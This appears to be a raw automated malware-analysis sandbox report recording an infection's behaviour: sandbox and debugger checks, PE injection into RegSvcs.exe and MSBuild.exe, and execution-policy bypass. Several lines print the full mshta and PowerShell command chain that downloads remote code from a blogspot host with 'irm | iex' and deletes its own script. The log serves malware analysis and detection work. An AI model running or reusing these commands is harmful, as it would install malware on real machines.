Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595592	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595458	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594992	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594710	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: ModuleAnalysisCache.0.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: svchost.exe, 00000012.00000002.3248187549.00000235C6855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3243881494.00000235C122B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: mshta.exe, 00000016.00000003.2651741000.000001EC28477000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: ModuleAnalysisCache.0.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegSvcs.exe, 00000005.00000002.3300848036.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: mshta.exe, 0000000E.00000003.2340030820.00000219E6161000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.2338954878.00000219E6161000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2626200818.0000028E452B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: ModuleAnalysisCache.0.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 0000000F.00000002.2330397504.000002D2C29E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_04D3A6B0 CheckRemoteDebuggerPresent,

5_2_04D3A6B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\mshta.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 13B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 740000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: B00000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: B50000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 1100000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 13B0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 13B2000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1482000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1484000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11CB008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 740000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 742000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 812000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 814000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5FE008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: B00000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: B02000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: BD2000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: BD4000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 981008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: B50000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: B52000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: C22000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: C24000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 837008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 1100000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 1102000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 11D2000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: 11D4000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe base: EC8008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);Start-Sleep -Seconds 5;

Source: unknown	Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:nd=['scripting.filesystemobject','wscript.shell','powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);start-sleep -seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new activexobject(la[2])[la[0]](la[3], 0, true);close();new activexobject(la[1]).deletefile(wscript.scriptfullname);"
Source: unknown	Process created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "javascript:ql=['scripting.filesystemobject','wscript.shell','powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);start-sleep -seconds 5;','run']; la=[ql[3
Source: unknown	Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe "javascript:nd=['scripting.filesystemobject','wscript.shell','powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);start-sleep -seconds 5;','run']; la=[nd[3],nd[0],nd[1],nd[2]]; new activexobject(la[2])[la[0]](la[3], 0, true);close();new activexobject(la[1]).deletefile(wscript.scriptfullname);"
Source: unknown	Process created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" "javascript:ql=['scripting.filesystemobject','wscript.shell','powershell -ep bypass -c [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;(irm minecap4-22-24.blogspot.com/haha \| iex);start-sleep -seconds 5;','run']; la=[ql[3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
